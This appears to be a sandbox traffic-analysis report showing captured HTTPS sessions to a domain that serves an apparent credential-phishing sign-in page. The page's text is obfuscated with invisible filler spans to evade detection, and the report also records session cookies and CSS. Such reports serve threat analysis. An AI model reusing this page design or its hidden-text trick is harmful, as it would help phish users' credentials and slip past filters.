                                                      2024-03-05 13:25:03 UTC629INData Raw: 37 34 62 38 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 32 66 38 63 65 64 62 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 69 6e 20 74 6f 20 74 68 65 20 42 65 73 74 20 50 72 6f 64 75 63 74 69 76 69 74 79 20 50 72 6f 76 69 64 65 72 21 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65
                                                      Data Ascii: 74b8 <html dir="ltr" class="3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cedb" lang="en"> <head> <title> Sign in to the Best Productivity Provider! </title> <meta http-equiv="Content-Type" content="text/html; charse
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 32 66 38 63 65 65 32 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 32 66 38 63 65 65 33 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30
                                                      Data Ascii: 7dc623777c6a8065e71d2f8cee2" rel="stylesheet"> </head> <body class="cb 3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee3" style="display: block;"> <div> <div> <div class="background 3485ef1ed169dedf7c7dc623777c6a80
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 36 61 38 30 36 35 65 37 31 64 32 66 38 63 65 66 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 5f 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 20 66 61 64 65 2d 69 6e 2d 6c 69 67 68 74 62 6f 78 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 32 66 38 63 65 66 62 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 62 6f 78 2d 63 6f 76 65 72 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 32 66 38 63 65 66 63 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20
                                                      Data Ascii: 6a8065e71d2f8cefa"> <div id="log_form" class="inner fade-in-lightbox 3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cefb"> <div class="lightbox-cover 3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cefc"> </div>
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 2d 6c 65 76 65 6c 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 64 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29
                                                      Data Ascii: -level="1"> S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">d</span>i<span style="display: inline; color: rgba(26, 125, 117, 0)
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 61 6c 65 72 74 22 20 61 72 69 61 2d 6c 69 76 65 3d 22 61 73 73 65 72 74 69 76 65 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <div role="alert" aria-live="assertive"> </div> <div hidden="" class="col-md-24 error ext-error" id="usernameError">
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61
                                                      Data Ascii: -height: 0.03px; font-size: 0.02px;">5</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; ma
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28
                                                      Data Ascii: 6, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>d<span style="display: inline; color: rgba(
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6e 3c 73 70
                                                      Data Ascii: n style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>n<sp
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 2c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30
                                                      Data Ascii: 03px; font-size: 0.02px;">5</span>,<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0
                                                      2024-03-05 13:25:03 UTC1369INData Raw: 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31
                                                      Data Ascii: , 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5</span>a<span style="display: inline; color: rgba(26, 125, 11


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.549755104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1161OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:03 UTC680INHTTP/1.1 404 Not Found
                                                      Date: Tue, 05 Mar 2024 13:25:03 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: BYPASS
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7b9iiJnvvBP2ZRgSSF%2BLzbwmUNbrI97iMSEBUMNayAJWzc0WwF717LY2zcVkqCxsLDsBsbh4Q4rU3gP5nWLq%2Bmuo4108dxyno2p39PIpYxdafXEXnh5fv4Rkumu9OPI%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e08aa6b423a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:03 UTC689INData Raw: 34 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                                                      Data Ascii: 4d5<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                                                      2024-03-05 13:25:03 UTC555INData Raw: 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e
                                                      Data Ascii: iv></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.
                                                      2024-03-05 13:25:03 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                      Data Ascii: 1
                                                      2024-03-05 13:25:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.549756104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1199OUTGET /APP-3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee1/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee2 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC735INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:25:04 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b5Wx3eit6QFGORPtVteE72QQ47QW7o9%2F0xki3HJXEsU4xZ8PiGTK0o%2FsvdABT7ODA35%2FsmZWmvDsvj2AvNyeDaYgI0bI28CLvW5u9cOmvuin%2FpnKvbmYJUaYDWAks3I%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0c59e842d5-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC634INData Raw: 33 39 35 30 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                      Data Ascii: 3950html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73
                                                      Data Ascii: ive;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monos
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74
                                                      Data Ascii: der-box;box-sizing:border-box}*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline-offset
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 6e 65 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 75 70 70
                                                      Data Ascii: ne}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-upp
